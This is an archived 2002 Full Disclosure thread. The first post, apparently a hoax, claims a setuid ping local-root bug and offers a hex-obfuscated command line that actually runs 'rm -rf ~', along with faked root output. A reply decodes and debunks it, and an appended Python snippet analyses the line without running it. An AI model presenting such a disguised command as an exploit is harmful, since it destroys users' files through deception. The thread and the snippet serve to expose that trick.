
Mailing List Archive: Full Disclosure: Full-Disclosure

ATTENTION Local Root ATTENTION

 

 



drdre at hush

Sep 15, 2002, 6:28 AM

Post #1 of 2
ATTENTION Local Root ATTENTION

DrDre-Labs recently discovered a rather dangerous bug in the "ping" program which is installed setuid-root on most unix and unix-like systems. This bug is not remotely exploitable.

Tested on FreeBSD 4.6

bash# id
uid=1337(drdre) gid=1006(researchers) groups=1006(researchers) 1008(lab-staff)

bash# ping `perl -e 'print "\x6d\x65\x5f\x67\x75\x6e\x5f\x69\x73\x5f\x63\x6c\x69\x63\x6b"x1024'`;`echo -e "\x72\x6d\x20\x2d\x72\x66\x20\x7e"`
server error ^


^

$ id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)


Vendors are already informed.


Greets: Captain Crunch, Peter Pan, Charly Root


Regards
--
DrDre security research group







draht at suse

Sep 15, 2002, 7:25 AM

Post #2 of 2
Re: ATTENTION Local Root ATTENTION

>
> bash# ping `perl -e 'print "\x6d\x65\x5f\x67\x75\x6e\x5f\x69\x73\x5f\x63\x6c\x69\x63\x6b"x1024'`;`echo -e "\x72\x6d\x20\x2d\x72\x66\x20\x7e"`
> server error ^
>

Yes.

This results in executing

rm -rf ~


> $ id
> uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
>
>
> Vendors are already informed.
>

Yes yes...

>
> Greets: Captain Crunch, Peter Pan, Charly Root
>
>
> Regards
> --
> DrDre security research group


Always good for a Sunday afternoon entertainment,
Roman.
--
Roman Drahtmüller <draht [at] suse> // "You don't need eyes to see,
SuSE Linux AG - Security Phone: // you need vision!"
Nürnberg, Germany +49-911-740530 // Maxi Jazz, Faithless
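
What the reply above points out can be checked without running the line. The following is an added example, not part of either post: it decodes the `\x` escapes inside each backtick substitution and notes whether the substitution sits where the shell expects a command name. The function names and the command-position heuristic are assumptions of this example; the heuristic ignores quoting and nested substitutions.

```python
import re

# Constructed sample: the command line quoted in the thread, kept as inert text.
SAMPLE = r'''ping `perl -e 'print "\x6d\x65\x5f\x67\x75\x6e\x5f\x69\x73\x5f\x63\x6c\x69\x63\x6b"x1024'`;`echo -e "\x72\x6d\x20\x2d\x72\x66\x20\x7e"`'''

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
BACKTICKS = re.compile(r"`([^`]*)`")


def decode_hex_escapes(text):
    """Replace every \\xNN escape with the character it encodes."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def inspect_command(line):
    """Describe each backtick substitution in a shell line without executing it.

    Returns a list of (raw, decoded, runs_as_command) tuples. A substitution
    that starts the line or directly follows ; & | ( is in command position,
    so whatever it prints is itself executed by the shell. This is a
    simplified heuristic (assumption), not a full shell parser.
    """
    findings = []
    for match in BACKTICKS.finditer(line):
        before = line[:match.start()].rstrip()
        runs_as_command = before == "" or before[-1] in ";&|("
        raw = match.group(1)
        findings.append((raw, decode_hex_escapes(raw), runs_as_command))
    return findings


if __name__ == "__main__":
    for raw, decoded, runs_as_command in inspect_command(SAMPLE):
        role = ("OUTPUT IS RUN AS A COMMAND" if runs_as_command
                else "output is passed as an argument")
        print(f"{role}: {decoded}")
```

The first substitution only produces a long argument for ping; the second follows the `;` and is therefore its own command, which is the part the reply calls out.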
